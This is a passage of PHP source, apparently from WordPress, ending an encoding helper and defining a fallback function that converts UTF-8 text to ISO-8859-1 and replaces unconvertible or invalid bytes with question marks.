$iso_8859_1_text; } $utf8 .= substr( $iso_8859_1_text, $was_at ); return $utf8; } /** * Converts a string from UTF-8 to ISO-8859-1, maintaining backwards compatibility * with the deprecated function from the PHP standard library. * * @since 6.9.0 * @access private * * @see \utf8_decode() * * @param string $utf8_text Text treated as UTF-8 bytes. * @return string Text converted into ISO-8859-1. */ function _wp_utf8_decode_fallback( $utf8_text ) { $utf8_text = (string) $utf8_text; $at = 0; $was_at = 0; $end = strlen( $utf8_text ); $iso_8859_1_text = ''; while ( $at < $end ) { // US-ASCII bytes are identical in ISO-8859-1 and UTF-8. These are 0x00–0x7F. $ascii_byte_count = strspn( $utf8_text, "\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f" . "\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" . " !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f", $at ); if ( $ascii_byte_count > 0 ) { $at += $ascii_byte_count; continue; } $next_at = $at; $invalid_length = 0; $found = _wp_scan_utf8( $utf8_text, $next_at, $invalid_length, null, 1 ); $span_length = $next_at - $at; $next_byte = '?'; if ( 1 !== $found ) { if ( $invalid_length > 0 ) { $next_byte = ''; goto flush_sub_part; } break; } // All convertible code points are two-bytes long. $byte1 = ord( $utf8_text[ $at ] ); if ( 0xC0 !== ( $byte1 & 0xE0 ) ) { goto flush_sub_part; } // All convertible code points are not greater than U+FF. $byte2 = ord( $utf8_text[ $at + 1 ] ); $code_point = ( ( $byte1 & 0x1F ) << 6 ) | ( ( $byte2 & 0x3F ) ); if ( $code_point > 0xFF ) { goto flush_sub_part; } $next_byte = chr( $code_point ); flush_sub_part: $iso_8859_1_text .= substr( $utf8_text, $was_at, $at - $was_at ); $iso_8859_1_text .= $next_byte; $at += $span_length; $was_at = $at; if ( $invalid_length > 0 ) { $iso_8859_1_text .= '?'; $at += $invalid_length; $was_at = $at; } } if ( 0 === $was_at ) { return $utf8_text; } $iso_8859_1_text .= substr( $utf8_text, $was_at ); return $iso_8859_1_text; }
Close